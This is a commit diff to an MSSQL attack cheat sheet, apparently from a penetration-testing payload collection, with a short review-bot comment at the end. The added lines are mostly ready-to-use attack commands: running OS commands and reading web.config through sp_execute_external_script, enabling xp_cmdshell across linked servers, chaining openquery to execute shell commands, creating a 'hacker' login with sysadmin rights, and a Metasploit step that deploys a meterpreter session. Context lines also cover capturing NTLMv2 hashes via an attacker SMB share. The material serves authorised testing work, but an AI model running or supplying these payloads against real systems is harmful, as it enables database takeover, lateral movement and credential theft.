MSSQL Trusted Link
This commit is contained in:
parent
008cbcf9fc
commit
da5dc1299e
@ -17,6 +17,7 @@
|
|||||||
* [MSSQL Command execution](#mssql-command-execution)
|
* [MSSQL Command execution](#mssql-command-execution)
|
||||||
* [MSSQL UNC path](#mssql-unc-path)
|
* [MSSQL UNC path](#mssql-unc-path)
|
||||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||||
|
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||||
|
|
||||||
## MSSQL comments
|
## MSSQL comments
|
||||||
|
|
||||||
@ -25,6 +26,12 @@
|
|||||||
/* comment goes here */
|
/* comment goes here */
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL User
|
||||||
|
|
||||||
|
```sql
|
||||||
|
SELECT CURRENT_USER
|
||||||
|
```
|
||||||
|
|
||||||
## MSSQL version
|
## MSSQL version
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword
|
|||||||
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute Python script
|
||||||
|
|
||||||
|
> Executed by a different user than the one using xp_cmdshell to execute commands
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
#Print the user being used (and execute commands)
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
||||||
|
#Open and read a file
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
||||||
|
#Multiline
|
||||||
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
|
||||||
|
import sys
|
||||||
|
print(sys.version)
|
||||||
|
'
|
||||||
|
GO
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## MSSQL UNC Path
|
## MSSQL UNC Path
|
||||||
|
|
||||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||||
@ -176,8 +202,41 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
|
|||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## MSSQL Trusted Links
|
||||||
|
|
||||||
|
> The links between databases work even across forest trusts.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
msf> use exploit/windows/mssql/mssql_linkcrawler
|
||||||
|
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
|
||||||
|
```
|
||||||
|
|
||||||
|
Manual exploitation
|
||||||
|
|
||||||
|
```sql
|
||||||
|
-- find link
|
||||||
|
select * from master..sysservers
|
||||||
|
|
||||||
|
-- execute query through the link
|
||||||
|
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||||||
|
select version from openquery("linkedserver", 'select @@version as version');
|
||||||
|
|
||||||
|
-- chain multiple openquery
|
||||||
|
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
|
||||||
|
|
||||||
|
-- execute shell commands
|
||||||
|
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
|
||||||
|
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
|
||||||
|
|
||||||
|
-- create user and give admin privileges
|
||||||
|
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
|
||||||
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
|
||||||
|
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||||
|
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
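Review bot: The `sp_execute_external_script` block added in the third hunk (under `Execute Python script`) is fenced as ```powershell although every line in it is T-SQL, and the metasploit block under `## MSSQL Trusted Links` carries the same fence; fencing the first as ```sql and the second as ```console would make the highlighting match the content. The `[msf> set DEPLOY true]` comment in the last hunk is truncated at `sessio`, presumably `session`. The manual Trusted Links section also never states the precondition that makes `EXECUTE(...) AT LinkedServer` work — the link's `rpc out` server option must be enabled and the linked login must map to a privileged remote context — which is exactly what a defender reviews in `sys.servers` (`is_rpc_out_enabled`) and `sys.linked_logins` when hardening links; a one-line note such as `-- EXECUTE ... AT needs 'rpc out' enabled on the link; openquery does not` would make the section both more accurate and more useful for mitigation.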